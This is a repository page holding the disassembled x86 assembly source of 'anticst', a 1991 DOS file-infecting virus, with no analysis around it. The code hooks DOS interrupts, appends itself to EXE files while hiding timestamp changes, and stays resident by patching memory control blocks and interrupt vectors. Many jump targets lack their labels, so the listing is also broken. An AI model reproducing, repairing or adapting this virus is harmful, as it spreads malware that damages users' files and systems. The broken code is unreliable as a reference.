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synced 2025-02-22 22:53:41 +00:00
584 lines
13 KiB
584 lines
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PAGE 60,132
;ÛÛ Created: 4-Mar-91 ÛÛ
data_1e equ 4Ch ; (0000:004C=31h)
data_2e equ 4Eh ; (0000:004E=70h)
data_3e equ 84h ; (0000:0084=0E3h)
data_4e equ 86h ; (0000:0086=161Ah)
data_5e equ 90h ; (0000:0090=8Eh)
data_6e equ 92h ; (0000:0092=1498h)
data_7e equ 102h ; (0000:0102=0CC00h)
data_8e equ 106h ; (0000:0106=326h)
data_9e equ 47Bh ; (0000:047B=0)
data_10e equ 0 ; (0326:0000=6A7h)
data_11e equ 2 ; (0326:0002=70h)
data_12e equ 0 ; (06A0:0000=65h)
data_13e equ 1 ; (06A1:0001=3028h)
data_14e equ 2 ; (06E3:0002=2342h)
data_15e equ 6 ; (06E3:0006=2344h)
data_33e equ 0FD89h ; (701E:FD89=0)
data_34e equ 0FD8Bh ; (701E:FD8B=0)
data_35e equ 0FDA1h ; (701E:FDA1=0)
data_36e equ 0FDA3h ; (701E:FDA3=0)
data_37e equ 0FDABh ; (701E:FDAB=0)
data_38e equ 0FDB5h ; (701E:FDB5=0)
data_39e equ 0FDB7h ; (701E:FDB7=0)
data_40e equ 0FDBDh ; (701E:FDBD=0)
data_41e equ 0FDBFh ; (701E:FDBF=0)
code_seg_a segment
assume cs:code_seg_a, ds:code_seg_a
org 100h
anticst proc far
data_16 dw 73E9h
data_17 dw 0C302h
db 23 dup (0C3h)
data_19 dw 0C3C3h
data_20 dw 0C3C3h
db 2Ah, 2Eh, 5Ah, 49h, 50h
db 0
data_22 dw 0
data_23 dw 0
data_24 dw 0
data_25 dw 0
data_26 dw 0
data_27 dd 00000h
data_28 dw 0
data_29 dw 0
data_30 dd 00000h
data_31 dw 0
data_32 dw 0
db 40h, 3Dh, 4Dh, 4Bh, 75h, 9
db 55h, 8Bh, 0ECh, 83h, 66h, 6
db 0FEh, 5Dh, 0CFh, 80h, 0FCh, 4Bh
db 74h, 12h, 3Dh, 0, 3Dh, 74h
db 0Dh, 3Dh, 0, 6Ch, 75h, 5
db 80h, 0FBh, 0, 74h, 3
jmp loc_12
push es
push ds
push di
push si
push bp
push dx
push cx
push bx
push ax
call sub_5
call sub_6
cmp ax,6C00h
jne loc_3 ; Jump if not equal
mov dx,si
mov cx,80h
mov si,dx
inc si
mov al,[si]
or al,al ; Zero ?
loopnz locloop_4 ; Loop if zf=0, cx>0
sub si,2
cmp word ptr [si],4558h
je loc_6 ; Jump if equal
jmp short loc_11
db 90h
cmp word ptr [si-2],452Eh
jz loc_7 ; Jump if zero
jmp short loc_5
mov ax,3D02h
call sub_4
jc loc_11 ; Jump if carry Set
mov bx,ax
mov ax,5700h
call sub_4
mov cs:data_23,cx ; (701E:0127=0)
mov cs:data_24,dx ; (701E:0129=0)
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_4
push cs
pop ds
mov dx,103h
mov si,dx
mov cx,18h
mov ah,3Fh ; '?'
call sub_4
jc loc_9 ; Jump if carry Set
cmp word ptr [si],5A4Dh
jne loc_8 ; Jump if not equal
call sub_1
jmp short loc_9
jmp short loc_9
jc loc_10 ; Jump if carry Set
mov ax,5701h
mov cx,cs:data_23 ; (701E:0127=0)
mov dx,cs:data_24 ; (701E:0129=0)
call sub_4
mov ah,3Eh ; '>'
call sub_4
call sub_6
pop ax
pop bx
pop cx
pop dx
pop bp
pop si
pop di
pop ds
pop es
jmp cs:data_27 ; (701E:012F=0)
anticst endp
sub_1 proc near
mov dx,10h
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA to ds:dx
mov dx,11Fh
mov cx,110Bh
mov ah,4Eh ; 'N'
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
mov dx,2Eh
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov ah,41h ; 'A'
int 21h ; DOS Services ah=function 41h
; delete file, name @ ds:dx
mov cx,[si+16h]
add cx,[si+8]
mov ax,10h
mul cx ; dx:ax = reg * ax
add ax,[si+14h]
adc dx,0
push dx
push ax
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_4
cmp dx,0
jne loc_13 ; Jump if not equal
cmp ax,3F0h
jae loc_13 ; Jump if above or =
pop ax
pop dx
stc ; Set carry flag
mov di,ax
mov bp,dx
pop cx
sub ax,cx
pop cx
sbb dx,cx
cmp word ptr [si+0Ch],0
je loc_ret_16 ; Jump if equal
cmp dx,0
jne loc_14 ; Jump if not equal
cmp ax,3F0h
jne loc_14 ; Jump if not equal
stc ; Set carry flag
mov dx,bp
mov ax,di
push dx
push ax
add ax,3F0h
adc dx,0
mov cx,200h
div cx ; ax,dx rem=dx:ax/reg
les di,dword ptr [si+2] ; Load 32 bit ptr
mov cs:data_25,di ; (701E:012B=0)
mov cs:data_26,es ; (701E:012D=0)
mov [si+2],dx
cmp dx,0
je loc_15 ; Jump if equal
inc ax
mov [si+4],ax
pop ax
pop dx
call sub_2
sub ax,[si+8]
les di,dword ptr [si+14h] ; Load 32 bit ptr
mov data_19,di ; (701E:011B=0C3C3h)
mov data_20,es ; (701E:011D=0C3C3h)
mov [si+14h],dx
mov [si+16h],ax
mov data_22,ax ; (701E:0125=0)
mov ax,4202h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_4
call sub_3
jc loc_ret_16 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
call sub_4
mov ah,40h ; '@'
mov dx,si
mov cx,18h
call sub_4
sub_1 endp
sub_2 proc near
mov cx,4
mov di,ax
and di,0Fh
shr dx,1 ; Shift w/zeros fill
rcr ax,1 ; Rotate thru carry
loop locloop_17 ; Loop if cx > 0
mov dx,di
sub_2 endp
sub_3 proc near
mov ah,40h ; '@'
mov cx,3F0h
mov dx,100h
call sub_5
jmp short loc_18
db 90h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
pushf ; Push flags
call cs:data_27 ; (701E:012F=0)
sub_3 endp
sub_5 proc near
push ax
push ds
push es
xor ax,ax ; Zero register
push ax
pop ds
cli ; Disable interrupts
les ax,dword ptr ds:data_5e ; (0000:0090=18Eh) Load 32 bit ptr
mov cs:data_28,ax ; (701E:0133=0)
mov cs:data_29,es ; (701E:0135=0)
mov ax,35Eh
mov ds:data_5e,ax ; (0000:0090=18Eh)
mov ds:data_6e,cs ; (0000:0092=1498h)
les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr
mov cs:data_31,ax ; (701E:013B=0)
mov cs:data_32,es ; (701E:013D=0)
les ax,cs:data_30 ; (701E:0137=0) Load 32 bit ptr
mov ds:data_1e,ax ; (0000:004C=831h)
mov ds:data_2e,es ; (0000:004E=70h)
sti ; Enable interrupts
pop es
pop ds
pop ax
sub_5 endp
sub_6 proc near
push ax
push ds
push es
xor ax,ax ; Zero register
push ax
pop ds
cli ; Disable interrupts
les ax,dword ptr cs:data_28 ; (701E:0133=0) Load 32 bit ptr
mov ds:data_5e,ax ; (0000:0090=18Eh)
mov ds:data_6e,es ; (0000:0092=1498h)
les ax,dword ptr cs:data_31 ; (701E:013B=0) Load 32 bit ptr
mov ds:data_1e,ax ; (0000:004C=831h)
mov ds:data_2e,es ; (0000:004E=70h)
sti ; Enable interrupts
pop es
pop ds
pop ax
sub_6 endp
db 0B0h, 3, 0CFh
sub_7 proc near
mov dx,10h
mul dx ; dx:ax = reg * ax
sub_7 endp
sub_8 proc near
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor cx,cx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
xor di,di ; Zero register
xor bp,bp ; Zero register
sub_8 endp
db 1Eh, 0E8h, 0, 0
sub_9 proc near
mov ax,4B4Dh
int 21h ; DOS Services ah=function 4Bh
; run progm @ds:dx, parm @es:bx
jc loc_19 ; Jump if carry Set
jmp loc_29
pop si
push si
mov di,si
xor ax,ax ; Zero register
push ax
pop ds
les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr
mov cs:data_40e[si],ax ; (701E:FDBD=0)
mov cs:data_41e[si],es ; (701E:FDBF=0)
les bx,dword ptr ds:data_3e ; (0000:0084=6E3h) Load 32 bit ptr
mov cs:data_38e[di],bx ; (701E:FDB5=0)
mov cs:data_39e[di],es ; (701E:FDB7=0)
mov ax,ds:data_7e ; (0000:0102=0CC00h)
cmp ax,0F000h
jne loc_27 ; Jump if not equal
mov dl,80h
mov ax,ds:data_8e ; (0000:0106=326h)
cmp ax,0F000h
je loc_20 ; Jump if equal
cmp ah,0C8h
jb loc_27 ; Jump if below
cmp ah,0F4h
jae loc_27 ; Jump if above or =
test al,7Fh
jnz loc_27 ; Jump if not zero
mov ds,ax
cmp word ptr ds:data_10e,0AA55h ; (0326:0000=6A7h)
jne loc_27 ; Jump if not equal
mov dl,ds:data_11e ; (0326:0002=70h)
mov ds,ax
xor dh,dh ; Zero register
mov cl,9
shl dx,cl ; Shift w/zeros fill
mov cx,dx
xor si,si ; Zero register
lodsw ; String [si] to ax
cmp ax,0FA80h
jne loc_22 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,7380h
je loc_23 ; Jump if equal
jnz loc_24 ; Jump if not zero
cmp ax,0C2F6h
jne loc_25 ; Jump if not equal
lodsw ; String [si] to ax
cmp ax,7580h
jne loc_24 ; Jump if not equal
inc si
lodsw ; String [si] to ax
cmp ax,40CDh
je loc_26 ; Jump if equal
sub si,3
dec si
dec si
dec si
loop locloop_21 ; Loop if cx > 0
jmp short loc_27
sub si,7
mov cs:data_40e[di],si ; (701E:FDBD=0)
mov cs:data_41e[di],ds ; (701E:FDBF=0)
mov ah,62h ; 'b'
int 21h ; DOS Services ah=function 62h
; get progrm seg prefix addr bx
mov es,bx
mov ah,49h ; 'I'
int 21h ; DOS Services ah=function 49h
; release memory block, es=seg
mov bx,0FFFFh
mov ah,48h ; 'H'
int 21h ; DOS Services ah=function 48h
; allocate memory, bx=bytes/16
sub bx,41h
jc loc_29 ; Jump if carry Set
mov cx,es
stc ; Set carry flag
adc cx,bx
mov ah,4Ah ; 'J'
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov bx,40h
stc ; Set carry flag
sbb es:data_14e,bx ; (06E3:0002=2342h)
push es
mov es,cx
mov ah,4Ah ; 'J'
int 21h ; DOS Services ah=function 4Ah
; change mem allocation, bx=siz
mov ax,es
dec ax
mov ds,ax
mov word ptr ds:data_13e,8 ; (06A1:0001=6220h)
call sub_7
mov bx,ax
mov cx,dx
pop ds
mov ax,ds
call sub_7
add ax,ds:data_15e ; (06E3:0006=2344h)
adc dx,0
sub ax,bx
sbb dx,cx
jc loc_28 ; Jump if carry Set
sub ds:data_15e,ax ; (06E3:0006=2344h)
mov si,di
xor di,di ; Zero register
push cs
pop ds
sub si,27Ah
mov cx,3F0h
inc cx
rep movsb ; Rep while cx>0 Mov [si] to es:[di]
mov ah,62h ; 'b'
int 21h ; DOS Services ah=function 62h
; get progrm seg prefix addr bx
dec bx
mov ds,bx
mov byte ptr ds:data_12e,5Ah ; (06A0:0000=65h) 'Z'
mov dx,140h
xor ax,ax ; Zero register
push ax
pop ds
mov ax,es
sub ax,10h
mov es,ax
cli ; Disable interrupts
mov ds:data_3e,dx ; (0000:0084=6E3h)
mov ds:data_4e,es ; (0000:0086=161Ah)
sti ; Enable interrupts
dec byte ptr ds:data_9e ; (0000:047B=0)
pop si
cmp word ptr cs:data_33e[si],5A4Dh ; (701E:FD89=0)
jne loc_30 ; Jump if not equal
pop ds
mov ax,cs:data_37e[si] ; (701E:FDAB=0)
mov bx,cs:data_36e[si] ; (701E:FDA3=0)
push cs
pop cx
sub cx,ax
add cx,bx
push cx
push word ptr cs:data_35e[si] ; (701E:FDA1=0)
push ds
pop es
call sub_8
ret ; Return far
pop ax
mov ax,cs:data_33e[si] ; (701E:FD89=0)
mov cs:data_16,ax ; (701E:0100=73E9h)
mov ax,cs:data_34e[si] ; (701E:FD8B=0)
mov cs:data_17,ax ; (701E:0102=0C302h)
mov ax,100h
push ax
push cs
pop ds
push ds
pop es
call sub_8
sub_9 endp
code_seg_a ends
end start